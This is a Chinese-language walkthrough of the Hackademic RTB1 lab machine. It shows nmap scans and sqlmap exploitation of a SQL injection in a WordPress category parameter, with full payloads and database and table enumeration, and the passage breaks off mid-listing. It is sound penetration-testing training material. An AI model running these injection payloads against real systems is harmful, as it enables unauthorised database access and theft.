HackademicRTB1
|
755
|
0

1313 字
|
55 分钟

HackademicRTB1

主机发现

nmap -sn 192.168.65.0/24
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-16 15:10 中国标准时间
Nmap scan report for 192.168.65.1
Host is up (0.0020s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.65.2
Host is up (0.0011s latency).
MAC Address: 00:50:56:EB:B8:29 (VMware)
Nmap scan report for 192.168.65.135
Host is up (0.0020s latency).
MAC Address: 00:0C:29:70:82:CA (VMware)
Nmap scan report for 192.168.65.254
Host is up (0.00097s latency).
MAC Address: 00:50:56:FD:72:65 (VMware)
Nmap scan report for 192.168.65.128
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.14 seconds

端口扫描

nmap --min-rate 10000 -p- 192.168.65.135 -oA nmapscan/ports
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-16 15:12 中国标准时间
Nmap scan report for 192.168.65.135
Host is up (0.048s latency).
Not shown: 65456 filtered tcp ports (no-response), 77 filtered tcp ports (host-prohibited)
PORT   STATE  SERVICE
22/tcp closed ssh
80/tcp open   http
MAC Address: 00:0C:29:70:82:CA (VMware)

Nmap done: 1 IP address (1 host up) scanned in 72.20 seconds

TCP

nmap -sT -sV -sC -O -p80 192.168.65.135 -oA nmapscan/detail
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-16 15:14 中国标准时间
Nmap scan report for 192.168.65.135
Host is up (0.00081s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.2.15 ((Fedora))
| http-methods:
|_  Potentially risky methods: TRACE
|_http-title: Hackademic.RTB1
|_http-server-header: Apache/2.2.15 (Fedora)
MAC Address: 00:0C:29:70:82:CA (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: media device|general purpose|storage-misc|webcam|firewall
Running (JUST GUESSING): LG embedded (97%), Linux 2.6.X|3.X|4.X (97%), Iomega embedded (91%), Tandberg embedded (91%), DirecTV embedded (89%), Check Point embedded (89%), Infomir embedded (88%)
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/h:iomega:ix4-200d cpe:/o:linux:linux_kernel:2.6.22 cpe:/h:directv:hr34 cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 cpe:/h:infomir:mag-250
Aggressive OS guesses: LG Bp430 Blu-ray Player (97%), Linux 2.6.22 - 2.6.36 (97%), Linux 2.6.32 (94%), Linux 2.6.24 - 2.6.36 (93%), Iomega StorCenter ix4-200d (Linux 2.6.31) (91%), Linux 2.6.23 - 2.6.38 (91%), Linux 2.6.31 - 2.6.35 (91%), Linux 2.6.9 - 2.6.18 (91%), Linux 2.6.9 - 2.6.27 (91%), Linux 2.6.39 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.18 seconds

UDP

nmap -sU -p80 192.168.65.135 -oA nmapscan/udp
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-16 15:17 中国标准时间
Nmap scan report for 192.168.65.135
Host is up (0.00s latency).

PORT   STATE    SERVICE
80/udp filtered http
MAC Address: 00:0C:29:70:82:CA (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.18 seconds

Nmap漏洞扫描

nmap --script=vuln -p80 192.168.65.135 -oA nmapscan/vuln
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-16 15:17 中国标准时间
Pre-scan script results:
| broadcast-avahi-dos:
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.65.135
Host is up (0.00s latency).

PORT   STATE SERVICE
80/tcp open  http
|_http-trace: TRACE is enabled
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-slowloris-check:
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
| http-vuln-cve2011-3192:
|   VULNERABLE:
|   Apache byterange filter DoS
|     State: VULNERABLE
|     IDs:  CVE:CVE-2011-3192  BID:49303
|       The Apache web server is vulnerable to a denial of service attack when numerous
|       overlapping byte ranges are requested.
|     Disclosure date: 2011-08-19
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192
|       https://www.tenable.com/plugins/nessus/55976
|       https://seclists.org/fulldisclosure/2011/Aug/175
|_      https://www.securityfocus.com/bid/49303
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum:
|_  /icons/: Potentially interesting folder w/ directory listing
MAC Address: 00:0C:29:70:82:CA (VMware)

Nmap done: 1 IP address (1 host up) scanned in 194.93 seconds

渗透思路

Web渗透

HTTP服务访问

点击target超链接跳转至http://192.168.65.135/Hackademic_RTB1/,并且此页面又多了两个链接地址

  • http://192.168.65.135/Hackademic_RTB1/?cat=1
  • http://192.168.65.135/Hackademic_RTB1/?p=9#comments

随手改个?cat=key.txt

curl http://192.168.65.135/Hackademic_RTB1/?cat=key.txt
curl : Hackademic.RTB1
The First Realistic Hackademic Challenge (root this box).
Not Found
Search

Search

Pages
WordPress database error: [Unknown column 'key.txt' in 'where clause']
SELECT * FROM wp_categories WHERE cat_ID = key.txt LIMIT 1
Archives
January 2011
Categories

爆出了SQL语句,直接扔到SQLMap跑下

sqlmap -u http://192.168.65.135/Hackademic_RTB1/?cat=key.txt --level=2
D:\Global\apps\sqlmap\current>python3 "sqlmap.py" -u http://192.168.65.135/Hackademic_RTB1/?cat=key.txt --level=2
__H__
___ ___[']_____ ___ ___  {1.7.9#stable}
|_ -| . [']     | .'| . |
|___|_  [(]_|_|_|__,|  _|
|_|V...       |_|   https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 15:36:28 /2024-01-16/
[15:36:28] [INFO] testing connection to the target URL
[15:36:28] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
[15:36:28] [INFO] checking if the target is protected by some kind of WAF/IPS
[15:36:28] [INFO] testing if the target URL content is stable
[15:36:29] [INFO] target URL content is stable
[15:36:29] [INFO] testing if GET parameter 'cat' is dynamic
[15:36:29] [INFO] GET parameter 'cat' appears to be dynamic
[15:36:29] [INFO] heuristic (basic) test shows that GET parameter 'cat' might be injectable (possible DBMS: 'MySQL')
[15:36:29] [INFO] testing for SQL injection on GET parameter 'cat'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (2) and risk (1) values? [Y/n]
[15:36:39] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:36:39] [WARNING] reflective value(s) found and filtering out
[15:36:39] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[15:36:40] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (comment)'
[15:36:40] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[15:36:40] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL)'
[15:36:40] [INFO] testing 'Boolean-based blind - Parameter replace (CASE)'
[15:36:40] [INFO] testing 'Generic inline queries'
[15:36:40] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[15:36:41] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[15:36:42] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[15:36:43] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[15:36:45] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[15:36:47] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[15:36:48] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[15:36:50] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[15:36:52] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[15:36:54] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[15:36:55] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET)'
[15:36:55] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[15:36:55] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT)'
[15:36:55] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[15:36:55] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int)'
[15:36:55] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[15:36:55] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[15:36:56] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[15:36:56] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[15:36:56] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[15:36:56] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Stacked queries'
[15:36:57] [INFO] testing 'MySQL < 5.0 boolean-based blind - Stacked queries'
[15:36:57] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[15:36:58] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[15:36:59] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[15:37:00] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[15:37:02] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[15:37:03] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[15:37:04] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[15:37:05] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[15:37:07] [INFO] GET parameter 'cat' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[15:37:07] [INFO] testing 'MySQL inline queries'
[15:37:07] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[15:37:07] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[15:37:07] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[15:37:07] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[15:37:07] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[15:37:07] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[15:37:07] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[15:37:27] [INFO] GET parameter 'cat' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[15:37:27] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[15:37:27] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[15:37:27] [INFO] testing 'Generic UNION query (NULL) - 21 to 40 columns'
[15:37:28] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[15:37:28] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
[15:37:29] [INFO] testing 'MySQL UNION query (NULL) - 21 to 40 columns'
[15:37:29] [INFO] testing 'MySQL UNION query (random number) - 21 to 40 columns'
[15:37:30] [INFO] testing 'MySQL UNION query (NULL) - 41 to 60 columns'
[15:37:30] [INFO] testing 'MySQL UNION query (random number) - 41 to 60 columns'
[15:37:31] [INFO] testing 'MySQL UNION query (NULL) - 61 to 80 columns'
[15:37:31] [INFO] testing 'MySQL UNION query (random number) - 61 to 80 columns'
[15:37:32] [INFO] testing 'MySQL UNION query (NULL) - 81 to 100 columns'
[15:37:32] [INFO] testing 'MySQL UNION query (random number) - 81 to 100 columns'
GET parameter 'cat' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 1468 HTTP(s) requests:
---
Parameter: cat (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: cat=key.txt AND (SELECT 5987 FROM(SELECT COUNT(*),CONCAT(0x716a767171,(SELECT (ELT(5987=5987,1))),0x717a716271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: cat=key.txt AND (SELECT 8686 FROM (SELECT(SLEEP(5)))iqzp)
---
[15:37:39] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Fedora 13 (Goddard)
web application technology: Apache 2.2.15, PHP 5.3.3
back-end DBMS: MySQL >= 5.0
[15:37:39] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1483 times
[15:37:39] [INFO] fetched data logged to text files under 'C:\Users\Administrator\AppData\Local\sqlmap\output\192.168.65.135'
[*] ending @ 15:37:39 /2024-01-16/
sqlmap -u http://192.168.65.135/Hackademic_RTB1/?cat=key.txt --level=2 --dbs
D:\Global\apps\sqlmap\current>python3 "sqlmap.py" -u http://192.168.65.135/Hackademic_RTB1/?cat=key.txt --level=2 --dbs
___
__H__
___ ___["]_____ ___ ___  {1.7.9#stable}
|_ -| . [(]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
|_|V...       |_|   https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 15:38:50 /2024-01-16/
[15:38:51] [INFO] resuming back-end DBMS 'mysql'
[15:38:51] [INFO] testing connection to the target URL
[15:38:51] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cat (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: cat=key.txt AND (SELECT 5987 FROM(SELECT COUNT(*),CONCAT(0x716a767171,(SELECT (ELT(5987=5987,1))),0x717a716271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: cat=key.txt AND (SELECT 8686 FROM (SELECT(SLEEP(5)))iqzp)
---
[15:38:51] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Fedora 13 (Goddard)
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL >= 5.0
[15:38:51] [INFO] fetching database names
[15:38:51] [WARNING] reflective value(s) found and filtering out
[15:38:51] [INFO] retrieved: 'information_schema'
[15:38:51] [INFO] retrieved: 'mysql'
[15:38:51] [INFO] retrieved: 'wordpress'
available databases [3]:
[*] information_schema
[*] mysql
[*] wordpress
[15:38:51] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 5 times
[15:38:51] [INFO] fetched data logged to text files under 'C:\Users\Administrator\AppData\Local\sqlmap\output\192.168.65.135'
[*] ending @ 15:38:51 /2024-01-16/
sqlmap -u http://192.168.65.135/Hackademic_RTB1/?cat=key.txt --level=2 --current-db
D:\Global\apps\sqlmap\current>python3 "sqlmap.py" -u http://192.168.65.135/Hackademic_RTB1/?cat=key.txt --level=2 --current-db
___
__H__
___ ___[']_____ ___ ___  {1.7.9#stable}
|_ -| . [,]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
|_|V...       |_|   https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 15:38:06 /2024-01-16/
[15:38:06] [INFO] resuming back-end DBMS 'mysql'
[15:38:06] [INFO] testing connection to the target URL
[15:38:06] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cat (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: cat=key.txt AND (SELECT 5987 FROM(SELECT COUNT(*),CONCAT(0x716a767171,(SELECT (ELT(5987=5987,1))),0x717a716271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: cat=key.txt AND (SELECT 8686 FROM (SELECT(SLEEP(5)))iqzp)
---
[15:38:06] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Fedora 13 (Goddard)
web application technology: Apache 2.2.15, PHP 5.3.3
back-end DBMS: MySQL >= 5.0
[15:38:06] [INFO] fetching current database
[15:38:06] [WARNING] reflective value(s) found and filtering out
[15:38:06] [INFO] retrieved: 'wordpress'
current database: 'wordpress'
[15:38:06] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2 times
[15:38:06] [INFO] fetched data logged to text files under 'C:\Users\Administrator\AppData\Local\sqlmap\output\192.168.65.135'
[*] ending @ 15:38:06 /2024-01-16/
sqlmap -u http://192.168.65.135/Hackademic_RTB1/?cat=key.txt --level=2 --current-user
D:\Global\apps\sqlmap\current>python3 "sqlmap.py" -u http://192.168.65.135/Hackademic_RTB1/?cat=key.txt --level=2 --current-user
___
__H__
___ ___[)]_____ ___ ___  {1.7.9#stable}
|_ -| . [,]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
|_|V...       |_|   https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 15:37:58 /2024-01-16/
[15:37:59] [INFO] resuming back-end DBMS 'mysql'
[15:37:59] [INFO] testing connection to the target URL
[15:37:59] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cat (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: cat=key.txt AND (SELECT 5987 FROM(SELECT COUNT(*),CONCAT(0x716a767171,(SELECT (ELT(5987=5987,1))),0x717a716271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: cat=key.txt AND (SELECT 8686 FROM (SELECT(SLEEP(5)))iqzp)
---
[15:37:59] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Fedora 13 (Goddard)
web application technology: Apache 2.2.15, PHP 5.3.3
back-end DBMS: MySQL >= 5.0
[15:37:59] [INFO] fetching current user
[15:37:59] [WARNING] reflective value(s) found and filtering out
[15:37:59] [INFO] retrieved: 'root@localhost'
current user: 'root@localhost'
[15:37:59] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2 times
[15:37:59] [INFO] fetched data logged to text files under 'C:\Users\Administrator\AppData\Local\sqlmap\output\192.168.65.135'
[*] ending @ 15:37:59 /2024-01-16/
sqlmap -u http://192.168.65.135/Hackademic_RTB1/?cat=key.txt --level=2 --tables
D:\Global\apps\sqlmap\current>python3 "sqlmap.py" -u http://192.168.65.135/Hackademic_RTB1/?cat=key.txt --level=2 --tables
___
__H__
___ ___[']_____ ___ ___  {1.7.9#stable}
|_ -| . ["]     | .'| . |
|___|_  [']_|_|_|__,|  _|
|_|V...       |_|   https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 15:48:09 /2024-01-16/
[15:48:10] [INFO] resuming back-end DBMS 'mysql'
[15:48:10] [INFO] testing connection to the target URL
[15:48:10] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cat (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: cat=key.txt AND (SELECT 5987 FROM(SELECT COUNT(*),CONCAT(0x716a767171,(SELECT (ELT(5987=5987,1))),0x717a716271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: cat=key.txt AND (SELECT 8686 FROM (SELECT(SLEEP(5)))iqzp)
---
[15:48:10] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Fedora 13 (Goddard)
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL >= 5.0
[15:48:10] [INFO] fetching database names
[15:48:10] [INFO] resumed: 'information_schema'
[15:48:10] [INFO] resumed: 'mysql'
[15:48:10] [INFO] resumed: 'wordpress'
[15:48:10] [INFO] fetching tables for databases: 'information_schema, mysql, wordpress'
[15:48:10] [WARNING] reflective value(s) found and filtering out
[15:48:10] [INFO] retrieved: 'information_schema'
[15:48:10] [INFO] retrieved: 'CHARACTER_SETS'
[15:48:10] [INFO] retrieved: 'information_schema'
[15:48:10] [INFO] retrieved: 'COLLATIONS'
[15:48:10] [INFO] retrieved: 'information_schema'
[15:48:10] [INFO] retrieved: 'COLLATION_CHARACTER_SET_APPLICABILITY'
[15:48:10] [INFO] retrieved: 'information_schema'
[15:48:10] [INFO] retrieved: 'COLUMNS'
[15:48:10] [INFO] retrieved: 'information_schema'
[15:48:10] [INFO] retrieved: 'COLUMN_PRIVILEGES'
[15:48:10] [INFO] retrieved: 'information_schema'
[15:48:10] [INFO] retrieved: 'ENGINES'
[15:48:10] [INFO] retrieved: 'information_schema'
[15:48:10] [INFO] retrieved: 'EVENTS'
[15:48:10] [INFO] retrieved: 'information_schema'
[15:48:10] [INFO] retrieved: 'FILES'
[15:48:10] [INFO] retrieved: 'information_schema'
[15:48:10] [INFO] retrieved: 'GLOBAL_STATUS'
[15:48:11] [INFO] retrieved: 'information_schema'
[15:48:11] [INFO] retrieved: 'GLOBAL_VARIABLES'
[15:48:11] [INFO] retrieved: 'information_schema'
[15:48:11] [INFO] retrieved: 'KEY_COLUMN_USAGE'
[15:48:11] [INFO] retrieved: 'information_schema'
[15:48:11] [INFO] retrieved: 'PARTITIONS'
[15:48:11] [INFO] retrieved: 'information_schema'
[15:48:11] [INFO] retrieved: 'PLUGINS'
[15:48:11] [INFO] retrieved: 'information_schema'
[15:48:11] [INFO] retrieved: 'PROCESSLIST'
[15:48:11] [INFO] retrieved: 'information_schema'
[15:48:11] [INFO] retrieved: 'PROFILING'
[15:48:11] [INFO] retrieved: 'information_schema'
[15:48:11] [INFO] retrieved: 'REFERENTIAL_CONSTRAINTS'
[15:48:11] [INFO] retrieved: 'information_schema'
[15:48:11] [INFO] retrieved: 'ROUTINES'
[15:48:11] [INFO] retrieved: 'information_schema'
[15:48:11] [INFO] retrieved: 'SCHEMATA'
[15:48:11] [INFO] retrieved: 'information_schema'
[15:48:11] [INFO] retrieved: 'SCHEMA_PRIVILEGES'
[15:48:11] [INFO] retrieved: 'information_schema'
[15:48:11] [INFO] retrieved: 'SESSION_STATUS'
[15:48:11] [INFO] retrieved: 'information_schema'
[15:48:11] [INFO] retrieved: 'SESSION_VARIABLES'
[15:48:11] [INFO] retrieved: 'information_schema'
[15:48:11] [INFO] retrieved: 'STATISTICS'
[15:48:11] [INFO] retrieved: 'information_schema'
[15:48:11] [INFO] retrieved: 'TABLES'
[15:48:11] [INFO] retrieved: 'information_schema'
[15:48:11] [INFO] retrieved: 'TABLE_CONSTRAINTS'
[15:48:11] [INFO] retrieved: 'information_schema'
[15:48:12] [INFO] retrieved: 'TABLE_PRIVILEGES'
[15:48:12] [INFO] retrieved: 'information_schema'
[15:48:12] [INFO] retrieved: 'TRIGGERS'
[15:48:12] [INFO] retrieved: 'information_schema'
[15:48:12] [INFO] retrieved: 'USER_PRIVILEGES'
[15:48:12] [INFO] retrieved: 'information_schema'
[15:48:12] [INFO] retrieved: 'VIEWS'
[15:48:12] [INFO] retrieved: 'mysql'
[15:48:12] [INFO] retrieved: 'columns_priv'
[15:48:12] [INFO] retrieved: 'mysql'
[15:48:12] [INFO] retrieved: 'db'
[15:48:12] [INFO] retrieved: 'mysql'
[15:48:12] [INFO] retrieved: 'event'
[15:48:12] [INFO] retrieved: 'mysql'
[15:48:12] [INFO] retrieved: 'func'
[15:48:12] [INFO] retrieved: 'mysql'
[15:48:12] [INFO] retrieved: 'general_log'
[15:48:12] [INFO] retrieved: 'mysql'
[15:48:12] [INFO] retrieved: 'help_category'
[15:48:12] [INFO] retrieved: 'mysql'
[15:48:12] [INFO] retrieved: 'help_keyword'
[15:48:12] [INFO] retrieved: 'mysql'
[15:48:12] [INFO] retrieved: 'help_relation'
[15:48:12] [INFO] retrieved: 'mysql'
[15:48:12] [INFO] retrieved: 'help_topic'
[15:48:12] [INFO] retrieved: 'mysql'
[15:48:12] [INFO] retrieved: 'host'
[15:48:12] [INFO] retrieved: 'mysql'
[15:48:12] [INFO] retrieved: 'ndb_binlog_index'
[15:48:12] [INFO] retrieved: 'mysql'
[15:48:12] [INFO] retrieved: 'plugin'
[15:48:12] [INFO] retrieved: 'mysql'
[15:48:12] [INFO] retrieved: 'proc'
[15:48:13] [INFO] retrieved: 'mysql'
[15:48:13] [INFO] retrieved: 'procs_priv'
[15:48:13] [INFO] retrieved: 'mysql'
[15:48:13] [INFO] retrieved: 'servers'
[15:48:13] [INFO] retrieved: 'mysql'
[15:48:13] [INFO] retrieved: 'slow_log'
[15:48:13] [INFO] retrieved: 'mysql'
[15:48:13] [INFO] retrieved: 'tables_priv'
[15:48:13] [INFO] retrieved: 'mysql'
[15:48:13] [INFO] retrieved: 'time_zone'
[15:48:13] [INFO] retrieved: 'mysql'
[15:48:13] [INFO] retrieved: 'time_zone_leap_second'
[15:48:13] [INFO] retrieved: 'mysql'
[15:48:13] [INFO] retrieved: 'time_zone_name'
[15:48:13] [INFO] retrieved: 'mysql'
[15:48:13] [INFO] retrieved: 'time_zone_transition'
[15:48:13] [INFO] retrieved: 'mysql'
[15:48:13] [INFO] retrieved: 'time_zone_transition_type'
[15:48:13] [INFO] retrieved: 'mysql'
[15:48:13] [INFO] retrieved: 'user'
[15:48:13] [INFO] retrieved: 'wordpress'
[15:48:13] [INFO] retrieved: 'wp_categories'
[15:48:13] [INFO] retrieved: 'wordpress'
[15:48:13] [INFO] retrieved: 'wp_comments'
[15:48:13] [INFO] retrieved: 'wordpress'
[15:48:13] [INFO] retrieved: 'wp_linkcategories'
[15:48:13] [INFO] retrieved: 'wordpress'
[15:48:13] [INFO] retrieved: 'wp_links'
[15:48:13] [INFO] retrieved: 'wordpress'
[15:48:13] [INFO] retrieved: 'wp_options'
[15:48:13] [INFO] retrieved: 'wordpress'
[15:48:13] [INFO] retrieved: 'wp_post2cat'
[15:48:14] [INFO] retrieved: 'wordpress'
[15:48:14] [INFO] retrieved: 'wp_postmeta'
[15:48:14] [INFO] retrieved: 'wordpress'
[15:48:14] [INFO] retrieved: 'wp_posts'
[15:48:14] [INFO] retrieved: 'wordpress'
[15:48:14] [INFO] retrieved: 'wp_users'
Database: information_schema
[28 tables]
+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMN_PRIVILEGES                     |
| FILES                                 |
| GLOBAL_STATUS                         |
| GLOBAL_VARIABLES                      |
| KEY_COLUMN_USAGE                      |
| PROFILING                             |
| REFERENTIAL_CONSTRAINTS               |
| ROUTINES                              |
| SCHEMATA                              |
| SCHEMA_PRIVILEGES                     |
| SESSION_STATUS                        |
| SESSION_VARIABLES                     |
| STATISTICS                            |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| USER_PRIVILEGES                       |
| VIEWS                                 |
| COLUMNS                               |
| ENGINES                               |
| EVENTS                                |
| PARTITIONS                            |
| PLUGINS                               |
| PROCESSLIST                           |
| TABLES                                |
| TRIGGERS                              |
+---------------------------------------+
Database: mysql
[23 tables]
+---------------------------------------+
| event                                 |
| host                                  |
| plugin                                |
| user                                  |
| columns_priv                          |
| db                                    |
| func                                  |
| general_log                           |
| help_category                         |
| help_keyword                          |
| help_relation                         |
| help_topic                            |
